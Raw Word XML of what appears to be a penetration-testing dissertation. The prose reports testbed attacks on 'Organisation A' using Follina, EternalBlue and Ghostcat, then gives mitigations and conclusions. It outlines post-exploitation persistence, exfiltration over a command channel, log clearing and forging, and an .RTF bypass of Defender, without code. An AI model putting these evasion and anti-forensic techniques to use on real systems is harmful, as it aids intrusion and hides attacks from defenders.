                  <wp:posOffset>2595921</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2353843" cy="300867"/>
                <wp:effectExtent l="0" t="0" r="27940" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="760259323" name="Rectangle 760259323"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2353843" cy="300867"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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28B497" id="Rectangle 760259323" o:spid="_x0000_s1026" style="position:absolute;margin-left:46.35pt;margin-top:204.4pt;width:185.35pt;height:23.7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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EC0D7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48911778" wp14:editId="490B7EF2">
            <wp:extent cx="4560201" cy="3032268"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259320" name="Picture 7602593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320" name="Picture 760259320" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId148">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="2519" b="1155"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4560201" cy="3032268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FF59F" w14:textId="596F90E8" w:rsidR="00EC0D7E" w:rsidRPr="00C11121" w:rsidRDefault="00EC0D7E" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="_Toc111363696"/>
      <w:bookmarkStart w:id="501" w:name="_Toc111363833"/>
      <w:bookmarkStart w:id="502" w:name="_Toc111981856"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>131</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: The Flags have been captured</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1832988279"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="500"/>
      <w:bookmarkEnd w:id="501"/>
      <w:bookmarkEnd w:id="502"/>
    </w:p>
    <w:p w14:paraId="05DAEA83" w14:textId="6B0F0D1B" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C42A43" w14:textId="77777777" w:rsidR="00C728C4" w:rsidRDefault="00C728C4" w:rsidP="00C728C4"/>
    <w:p w14:paraId="022890CF" w14:textId="4F02BF5C" w:rsidR="00E74CD6" w:rsidRDefault="00E74CD6" w:rsidP="00E74CD6"/>
    <w:p w14:paraId="37740C1B" w14:textId="77777777" w:rsidR="00E74CD6" w:rsidRPr="00E74CD6" w:rsidRDefault="00E74CD6" w:rsidP="00E74CD6"/>
    <w:p w14:paraId="6ADF36B1" w14:textId="77777777" w:rsidR="00C728C4" w:rsidRPr="00C728C4" w:rsidRDefault="00C728C4" w:rsidP="00C728C4"/>
    <w:p w14:paraId="2F6CC1CB" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00BE7E14" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A535180" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00630DE9" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3883AA0B" w14:textId="542EBBFA" w:rsidR="00DF42B8" w:rsidRPr="00AD1327" w:rsidRDefault="005631CF" w:rsidP="002C1C42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="503" w:name="_Toc113190759"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CHAPTER 6: </w:t>
      </w:r>
      <w:r w:rsidR="004C5AE5">
        <w:t>DISCUSSION AND ANALYSIS OF RESULTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p w14:paraId="49BAAACD" w14:textId="77777777" w:rsidR="00D44DC6" w:rsidRDefault="00D44DC6" w:rsidP="00D44DC6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The aim of the report was to investigate the current cybersecurity stance of Organization A, and this was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24808D99" w14:textId="6188F157" w:rsidR="00A17A82" w:rsidRDefault="00A17A82" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running OpenVAS against Organisation A’s network </w:t>
      </w:r>
      <w:r w:rsidR="00711490">
        <w:t>provided a report detailing several vulnerabilities. ‘Follina’ was used</w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t xml:space="preserve"> as one of the methods to gain remote access to the network</w:t>
      </w:r>
      <w:r w:rsidR="00711490">
        <w:t>. In the testbed environment the payload document was transferred to the victim machine</w:t>
      </w:r>
      <w:r w:rsidR="00727297">
        <w:t xml:space="preserve"> whereas it would usually be sent via a phishing email. An employee would have to </w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t xml:space="preserve">open the document and </w:t>
      </w:r>
      <w:r w:rsidR="00727297">
        <w:t xml:space="preserve">‘enable editing’ for </w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00727297">
        <w:t xml:space="preserve"> to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123443CC" w14:textId="7291B080" w:rsidR="00C607E6" w:rsidRDefault="00C607E6" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>EternalBlue was run as an internal attack although it could be run remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B39B7" w14:textId="5A2D0932" w:rsidR="0026247B" w:rsidRDefault="00727297" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Once access to the network was obtained, there are any number of</w:t>
      </w:r>
      <w:r w:rsidR="00A31860">
        <w:t xml:space="preserve"> post</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidR="00A31860">
        <w:t xml:space="preserve"> pivots</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that c</w:t>
      </w:r>
      <w:r w:rsidR="00A31860">
        <w:t>ould</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be run. The first would be to create a valid ‘user’ with password within Microsoft Defender with elevated privileges so that there was less likelihood of being flagged by any security software</w:t>
      </w:r>
      <w:r w:rsidR="00A31860">
        <w:t xml:space="preserve"> thereby establishing persistence.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t>Some of the p</w:t>
      </w:r>
      <w:r w:rsidR="00960182">
        <w:t xml:space="preserve">ayloads that could be executed are ransomware, DDoS attacks or DoublePulsar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF16D2" w14:textId="47DF5BAD" w:rsidR="00A31860" w:rsidRDefault="00A31860" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007F71A3">
        <w:t>ata</w:t>
      </w:r>
      <w:r w:rsidR="007F71A3">
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidR="007F71A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">could be exfiltrated </w:t>
      </w:r>
      <w:r w:rsidR="00960182">
        <w:t xml:space="preserve">either through the command-and-control channel and </w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t>to hide</w:t>
      </w:r>
      <w:r w:rsidR="00960182">
        <w:t xml:space="preserve"> may put size limitations on transmission including compression and encryption </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-718512778"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[58]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00960182">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00744816">
        <w:t>Once</w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t xml:space="preserve"> persistence has been established and</w:t>
      </w:r>
      <w:r w:rsidR="00744816">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="007F71A3">
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r w:rsidR="00744816">
        <w:t xml:space="preserve">exfiltration is </w:t>
      </w:r>
      <w:r w:rsidR="007F71A3">
        <w:t>accomplished,</w:t>
      </w:r>
      <w:r w:rsidR="00960182">
        <w:t xml:space="preserve"> obfuscation of the tracks </w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t>could transpire</w:t>
      </w:r>
      <w:r w:rsidR="00960182">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000A7273">
        <w:t xml:space="preserve">There are many ways of doing this eg. Metasploit have commands that clear entire event logs on victim machine – although the downside is that it becomes suspicious as all the logs disappear so forensic </w:t>
      </w:r>
      <w:r w:rsidR="000A7273">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">analysis </w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t>woul</w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t xml:space="preserve">d be aware </w:t>
      </w:r>
      <w:r w:rsidR="000A7273">
        <w:t xml:space="preserve">that something </w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t>occurred but would be unable to ascertain what</w:t>
      </w:r>
      <w:r w:rsidR="000A7273">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AD601D">
        <w:t>There are many other forensic countermeasures that could be used such as</w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t xml:space="preserve"> specific log deletion,</w:t>
      </w:r>
      <w:r w:rsidR="00AD601D">
        <w:t xml:space="preserve"> changing</w:t>
      </w:r>
      <w:r w:rsidR="00C607E6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AD601D">
        <w:t xml:space="preserve"> or forging event log entries</w:t>
      </w:r>
      <w:r w:rsidR="007F11BC">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AD601D">
        <w:t xml:space="preserve"> or changing timestamp values </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="176238569"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[59]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AD601D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28794D93" w14:textId="3E47D595" w:rsidR="00AD601D" w:rsidRDefault="0061335D" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploiting the Ghostcat vulnerability permits attackers to read the resources on the Tomcat server. This means that the configuration or source code files of all the webapps deployed can be disclosed. </w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t>Us</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ing the </w:t>
      </w:r>
      <w:r w:rsidR="00B558A3">
        <w:t>Jerry with MSFVenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t>further compound</w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t>matter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as malicious</w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>files can be uploaded</w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t xml:space="preserve"> to the server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resulting in </w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">emote </w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ode </w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>xecution.</w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t xml:space="preserve"> Once exploited</w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t xml:space="preserve"> some of</w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t xml:space="preserve"> the possibilit</w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t>ies are</w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A627C1">
        <w:t xml:space="preserve">persistence via a backdoor, </w:t>
      </w:r>
      <w:r w:rsidR="00E7765B">
        <w:t xml:space="preserve">code could be </w:t>
      </w:r>
      <w:r w:rsidR="00A627C1">
        <w:t>trigger</w:t>
      </w:r>
      <w:r w:rsidR="00E7765B">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00A627C1">
        <w:t xml:space="preserve"> to steal </w:t>
      </w:r>
      <w:r w:rsidR="00591F2C">
        <w:t>client data,</w:t>
      </w:r>
      <w:r w:rsidR="00A627C1">
        <w:t xml:space="preserve"> influence operations</w:t>
      </w:r>
      <w:r w:rsidR="00C607E6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A627C1">
        <w:t xml:space="preserve"> or disrupt services.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E476C6E" w14:textId="057EDA41" w:rsidR="007C71EA" w:rsidRDefault="007C71EA" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Mitigation techniques</w:t>
      </w:r>
      <w:r w:rsidR="00A627C1">
        <w:t xml:space="preserve"> are available for all these exploits as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E897923" w14:textId="6C9E7370" w:rsidR="00A627C1" w:rsidRDefault="00A627C1" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Follina is usually blocked by Microsoft Defender although according to </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1390337505"/>
          <w:placeholder>
            <w:docPart w:val="44C8873D8E2A43F6B16FAAC6FC588515"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[33]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> using an .RTF file would bypass this defence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E6FAA" w14:textId="3010B861" w:rsidR="00A627C1" w:rsidRDefault="006A74F9" w:rsidP="006A74F9">
      <w:r>
        <w:t>EternalBlue could be mitigated by upgrading the OS on the machine to one that receives security updates. If this is not possible then consideration should be given to removing access to the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015CDCB" w14:textId="64D98AEB" w:rsidR="006A74F9" w:rsidRDefault="006A74F9" w:rsidP="006A74F9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ghostcat and Jerry with MSFVenom exploits can be mitigated by updating the Apache Tomcat </w:t>
      </w:r>
      <w:r w:rsidRPr="006A74F9">
        <w:t xml:space="preserve">webserver to </w:t>
      </w:r>
      <w:r w:rsidRPr="006A74F9">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>version 7.0.100, 8.5.51, 9.0.31 or later</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896DD4C" w14:textId="287F7E8B" w:rsidR="00EC2F5D" w:rsidRPr="00C607E6" w:rsidRDefault="00C607E6" w:rsidP="00C607E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Following these experiments Organisation A is in a much better position to understand and mitigate the vulnerabilities found by OpenVAS. </w:t>
      </w:r>
      <w:r w:rsidR="00E7765B">
        <w:t>This type of in-depth testing has allowed</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A74F9">
        <w:t xml:space="preserve">Organisation A </w:t>
      </w:r>
      <w:r w:rsidR="00E7765B">
        <w:t>to have</w:t>
      </w:r>
      <w:r w:rsidR="006A74F9">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00E7765B">
        <w:t>more effective security stance.</w:t>
      </w:r>
      <w:r w:rsidR="006A74F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130181C3" w14:textId="733552EF" w:rsidR="006A74F9" w:rsidRDefault="00EC2F5D" w:rsidP="00561022">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The position should be evaluated regularly on a quarterly basis to ensure that when new exploits are created Organisation A can mitigate against any new threats and are thereby less vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A539B18" w14:textId="602AB956" w:rsidR="00321363" w:rsidRDefault="00D44DC6" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The results would have benefitted from running each experiment as a remote, external, and internal attack however time constraints did not permit this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705E694" w14:textId="2EEA0214" w:rsidR="00DF42B8" w:rsidRPr="000D47BB" w:rsidRDefault="00DF42B8" w:rsidP="000D47BB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B839D6" w14:textId="19CC14D7" w:rsidR="00561022" w:rsidRDefault="005631CF" w:rsidP="00561022">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="504" w:name="_Toc113190760"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CHAPTER </w:t>
      </w:r>
      <w:r w:rsidR="00103ABA">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E923A4">
        <w:t>CONCLUSION AND RECOMMENDATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
    </w:p>
    <w:p w14:paraId="4EEA5EA3" w14:textId="17412EA1" w:rsidR="00E923A4" w:rsidRDefault="00E923A4" w:rsidP="00E923A4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="505" w:name="_Toc113190761"/>
      <w:r>
        <w:t>7.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w14:paraId="68E5CD59" w14:textId="0FCA4698" w:rsidR="00E923A4" w:rsidRDefault="00E923A4" w:rsidP="00E923A4">
      <w:r>
        <w:t>In concluding this report ‘an</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0994">
        <w:t xml:space="preserve"> Investigation of a Post-Breach, Upgraded Security Stance using Vulnerability Scanning and Penetration Testing Techniques</w:t>
      </w:r>
      <w:r>
        <w:t>’, an outline of each chapter will be</w:t>
      </w:r>
      <w:r w:rsidR="00C911A2">
        <w:t xml:space="preserve"> made to ascertain its success or failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02FB0D" w14:textId="53725597" w:rsidR="00C911A2" w:rsidRDefault="00C911A2" w:rsidP="00E923A4">
      <w:r>
        <w:t xml:space="preserve">Chapter One clearly set out the aim and objectives that were required to ensure that this project was achieved. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A7445" w14:textId="518C8676" w:rsidR="00C911A2" w:rsidRDefault="00C911A2" w:rsidP="00E923A4">
      <w:r>
        <w:t xml:space="preserve">Research into the specific CVEs was conducted for Chapter Two and illustrated what flaws </w:t>
      </w:r>
      <w:r w:rsidR="00E82028">
        <w:t>exist within each protocol or system that allows the penetration techniques to work</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E82028">
        <w:t xml:space="preserve"> This insight greatly assisted with understanding how the tests should be carried out and what aspects of the code needed to be considered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060EA536" w14:textId="2250AA30" w:rsidR="003900AC" w:rsidRDefault="00E82028" w:rsidP="00E923A4">
      <w:r>
        <w:t>Chapter Three provided a research methodology</w:t>
      </w:r>
      <w:r w:rsidR="00C151B1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>a contingency plan</w:t>
      </w:r>
      <w:r w:rsidR="00C151B1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C151B1">
        <w:t xml:space="preserve">risk assessment </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00C151B1">
        <w:t>ethical considerations</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000E5A4A">
        <w:t xml:space="preserve"> As the implication of Organisation A waiting for the results of the investigation w</w:t>
      </w:r>
      <w:r w:rsidR="0063625C">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="000E5A4A">
        <w:t xml:space="preserve"> unethical, the contingency plan was used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC374C4" w14:textId="26A60750" w:rsidR="009142C6" w:rsidRDefault="00A76DE6" w:rsidP="00E923A4">
      <w:r>
        <w:t xml:space="preserve">The design and implementation of the testbed was considered in Chapter Four, and this set out all the steps that were required before experimentation could be undertaken. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31265560" w14:textId="33D19E1D" w:rsidR="00A76DE6" w:rsidRDefault="00A76DE6" w:rsidP="00E923A4">
      <w:r>
        <w:t>Chapter Five contained phase one and two of the experiments. A synopsis of the results is set out as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31673ECC" w14:textId="1E204EFF" w:rsidR="00A76DE6" w:rsidRDefault="00542EA0" w:rsidP="00E923A4">
      <w:r>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidR="00A76DE6">
        <w:t xml:space="preserve">OpenVAS </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scan </w:t>
      </w:r>
      <w:r w:rsidR="00A76DE6">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00DD2720">
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00A76DE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>over</w:t>
      </w:r>
      <w:r w:rsidR="00A76DE6">
        <w:t xml:space="preserve"> Organisation A’s network to generate a report of CVEs. This produced </w:t>
      </w:r>
      <w:r w:rsidR="00981599">
        <w:t>over 90 results ranging in severity from 10 (the maximum) to</w:t>
      </w:r>
      <w:r w:rsidR="00302785">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00ED1E38">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00981599">
        <w:t>.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6518196C" w14:textId="77777777" w:rsidR="00981599" w:rsidRDefault="00981599" w:rsidP="00E923A4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This report was used to determine which attack vectors would be the most likely to succeed in penetrating Organisation’s A security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC4C33" w14:textId="77777777" w:rsidR="00DD2720" w:rsidRDefault="00DD2720" w:rsidP="00E923A4">
      <w:r>
        <w:t>Follina was used to breach the network security perimeter and although it worked on the testbed, if Organisation A had Microsoft Defender software running then this would have been blocked.</w:t>
      </w:r>
    </w:p>
